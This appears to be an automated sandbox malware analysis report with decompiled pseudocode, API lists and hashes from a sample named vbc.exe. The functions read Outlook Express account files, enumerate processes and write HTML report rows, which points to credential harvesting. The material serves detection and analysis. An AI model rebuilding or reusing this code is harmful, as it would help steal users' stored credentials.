                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                                                                    • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                                                                                    • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                                                                                                    • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                                                                                    • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410BC7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;

				_t12 = E00405ECB(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) {
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L004115D0();
						_t25 = _t15;
						_t28 = _t15;
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E004066F6(_t25, _a8, _t28, _t5);
						_t19 = _t28 + _t31;
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						E00410A8A(_t25, _t37, _a4, _t28);
						_push(_t28);
						L004115D6();
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}









                                                                                                                                                    0x00410bcd
                                                                                                                                                    0x00410bd6
                                                                                                                                                    0x00410bd9
                                                                                                                                                    0x00410be7
                                                                                                                                                    0x00410be9
                                                                                                                                                    0x00410bec
                                                                                                                                                    0x00410bee
                                                                                                                                                    0x00410bee
                                                                                                                                                    0x00410bf3
                                                                                                                                                    0x00410bf8
                                                                                                                                                    0x00410c00
                                                                                                                                                    0x00410c02
                                                                                                                                                    0x00410c08
                                                                                                                                                    0x00410c10
                                                                                                                                                    0x00410c18
                                                                                                                                                    0x00410c1f
                                                                                                                                                    0x00410c22
                                                                                                                                                    0x00410c25
                                                                                                                                                    0x00410c27
                                                                                                                                                    0x00410c2c
                                                                                                                                                    0x00410c2d
                                                                                                                                                    0x00410c33
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410c3e
                                                                                                                                                    0x00410c40

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                                                                                                      • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                                                                                                      • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                                                                                                      • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                                                                      • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                                                                      • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                                                                                                                      • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                                                                                                      • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00410C37
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                    • String ID: rA
                                                                                                                                                    • API String ID: 1886237854-474049127
                                                                                                                                                    • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                                                                                    • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                                                                                                                    • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                                                                                    • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409E32 Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                                                                                    0x00409e38

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                                                                                    • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                                                                                    • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                                                                                    • SendMessageA.USER32 ref: 00409EBB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3673709545-0
                                                                                                                                                    • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                                                                                    • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                                                                                                    • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                                                                                    • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409E33 Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                                                                                    0x00409e38

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                                                                                    • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                                                                                    • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                                                                                    • SendMessageA.USER32 ref: 00409EBB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3673709545-0
                                                                                                                                                    • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                                                                                    • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                                                                                                    • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                                                                                    • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407D0A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E00407D0A(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E004118A0(0x1004, _t17);
				_t21 =  *0x4171b8;
				if( *0x4171b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4172c0, "dialog_%d",  *0x417300);
					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407CAD, 0);
				}
				return _t8;
			}







                                                                                                                                                    0x00407d12
                                                                                                                                                    0x00407d17
                                                                                                                                                    0x00407d1e
                                                                                                                                                    0x00407d2e
                                                                                                                                                    0x00407d35
                                                                                                                                                    0x00407d4a
                                                                                                                                                    0x00407d65
                                                                                                                                                    0x00407d71
                                                                                                                                                    0x00407d71
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407d81
                                                                                                                                                    0x00407d88

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00407D35
                                                                                                                                                    • sprintf.MSVCRT ref: 00407D4A
                                                                                                                                                      • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                                                                                                      • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                                                                                                      • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                                                                                                    • EnumChildWindows.USER32 ref: 00407D81
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                    • API String ID: 246480800-4161923789
                                                                                                                                                    • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                                                                                    • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                                                                                                    • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                                                                                    • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E255 Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                    			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E004118A0(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E0040629C() == 0 ||  *0x417518 == 0) {
					if( *0x417514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x416fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x416fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040E45F(_a8,  &_v316) != 0) {
									_t64 =  *0x416fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x416fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
									E0040E172( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x416fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040E45F(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}
































                                                                                                                                                    0x0040e25d
                                                                                                                                                    0x0040e265
                                                                                                                                                    0x0040e267
                                                                                                                                                    0x0040e271
                                                                                                                                                    0x0040e395
                                                                                                                                                    0x0040e39b
                                                                                                                                                    0x0040e3a1
                                                                                                                                                    0x0040e3aa
                                                                                                                                                    0x0040e3ad
                                                                                                                                                    0x0040e3c0
                                                                                                                                                    0x0040e3c7
                                                                                                                                                    0x0040e3cd
                                                                                                                                                    0x0040e44a
                                                                                                                                                    0x0040e3e2
                                                                                                                                                    0x0040e3ed
                                                                                                                                                    0x0040e401
                                                                                                                                                    0x0040e407
                                                                                                                                                    0x0040e412
                                                                                                                                                    0x0040e41b
                                                                                                                                                    0x0040e41e
                                                                                                                                                    0x0040e42b
                                                                                                                                                    0x0040e438
                                                                                                                                                    0x0040e444
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e444
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e438
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e44a
                                                                                                                                                    0x0040e3ad
                                                                                                                                                    0x0040e283
                                                                                                                                                    0x0040e28c
                                                                                                                                                    0x0040e294
                                                                                                                                                    0x0040e297
                                                                                                                                                    0x0040e2a0
                                                                                                                                                    0x0040e2a1
                                                                                                                                                    0x0040e2ac
                                                                                                                                                    0x0040e2ad
                                                                                                                                                    0x0040e2b6
                                                                                                                                                    0x0040e2bc
                                                                                                                                                    0x0040e2bc
                                                                                                                                                    0x0040e2c0
                                                                                                                                                    0x0040e2c7
                                                                                                                                                    0x0040e2ca
                                                                                                                                                    0x0040e2d9
                                                                                                                                                    0x0040e2e2
                                                                                                                                                    0x0040e2e9
                                                                                                                                                    0x0040e2fb
                                                                                                                                                    0x0040e306
                                                                                                                                                    0x0040e30d
                                                                                                                                                    0x0040e311
                                                                                                                                                    0x0040e322
                                                                                                                                                    0x0040e328
                                                                                                                                                    0x0040e33a
                                                                                                                                                    0x0040e33f
                                                                                                                                                    0x0040e344
                                                                                                                                                    0x0040e345
                                                                                                                                                    0x0040e34b
                                                                                                                                                    0x0040e356
                                                                                                                                                    0x0040e35b
                                                                                                                                                    0x0040e361
                                                                                                                                                    0x0040e361
                                                                                                                                                    0x0040e375
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e37b
                                                                                                                                                    0x0040e384
                                                                                                                                                    0x0040e2d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e38a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e384
                                                                                                                                                    0x0040e2d9
                                                                                                                                                    0x0040e2ca
                                                                                                                                                    0x0040e44e
                                                                                                                                                    0x0040e451
                                                                                                                                                    0x0040e451
                                                                                                                                                    0x0040e297
                                                                                                                                                    0x0040e45e

                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                                                                                                    • memset.MSVCRT ref: 0040E2E9
                                                                                                                                                    • memset.MSVCRT ref: 0040E2FB
                                                                                                                                                      • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                                                                                    • memset.MSVCRT ref: 0040E3E2
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3799309942-0
                                                                                                                                                    • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                                                                                    • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                                                                                                    • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                                                                                    • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409369 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                    			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				void* __edi;
				signed int _t51;
				char* _t53;
				char* _t63;
				intOrPtr* _t69;
				signed int _t70;
				char _t84;
				intOrPtr* _t91;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t69 = __ebx;
				_t70 = 6;
				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
				_t97 = _t96 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00405EFD(_a4, "<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t91 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
						E0040F071(_v28,  &_v68);
						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
						_t63 =  *(_t69 + 0x50);
						_t84 =  *_t63;
						if(_t84 == 0 || _t84 == 0x20) {
							strcat(_t63, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
						E00405EFD(_a4,  *(_t69 + 0x4c));
						_t97 = _t97 + 0x20;
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
				}
				return E00405EFD(_a4, 0x412b1c);
			}























                                                                                                                                                    0x00409369
                                                                                                                                                    0x00409373
                                                                                                                                                    0x0040937c
                                                                                                                                                    0x0040937c
                                                                                                                                                    0x0040937e
                                                                                                                                                    0x00409388
                                                                                                                                                    0x00409389
                                                                                                                                                    0x0040938a
                                                                                                                                                    0x0040938b
                                                                                                                                                    0x0040938c
                                                                                                                                                    0x00409396
                                                                                                                                                    0x00409397
                                                                                                                                                    0x0040939c
                                                                                                                                                    0x004093a3
                                                                                                                                                    0x004093a9
                                                                                                                                                    0x004093ac
                                                                                                                                                    0x004093b2
                                                                                                                                                    0x004093bd
                                                                                                                                                    0x004093c0
                                                                                                                                                    0x004093c2
                                                                                                                                                    0x004093c2
                                                                                                                                                    0x004093c5
                                                                                                                                                    0x004093c8
                                                                                                                                                    0x004093cc
                                                                                                                                                    0x004093d0
                                                                                                                                                    0x004093d4
                                                                                                                                                    0x004093de
                                                                                                                                                    0x004093e7
                                                                                                                                                    0x004093f1
                                                                                                                                                    0x00409407
                                                                                                                                                    0x00409417
                                                                                                                                                    0x0040941a
                                                                                                                                                    0x0040941d
                                                                                                                                                    0x00409421
                                                                                                                                                    0x0040942e
                                                                                                                                                    0x00409434
                                                                                                                                                    0x0040943e
                                                                                                                                                    0x00409450
                                                                                                                                                    0x0040945b
                                                                                                                                                    0x00409460
                                                                                                                                                    0x00409463
                                                                                                                                                    0x00409464
                                                                                                                                                    0x004093a9
                                                                                                                                                    0x0040947f

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                                                                                                                    • sprintf.MSVCRT ref: 00409450
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWritesprintfstrcatstrlen
                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                    • API String ID: 3813295786-4153097237
                                                                                                                                                    • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                                                                                    • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                                                                                                                    • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                                                                                    • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410A8A Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E004118A0(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L004115D0();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E0040FE05( &_v5796, _t80);
				_v5796 = 0x4144ac;
				E004104BC( &_v3636);
				E004104BC( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0040FF76(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E00410081(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060D0(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
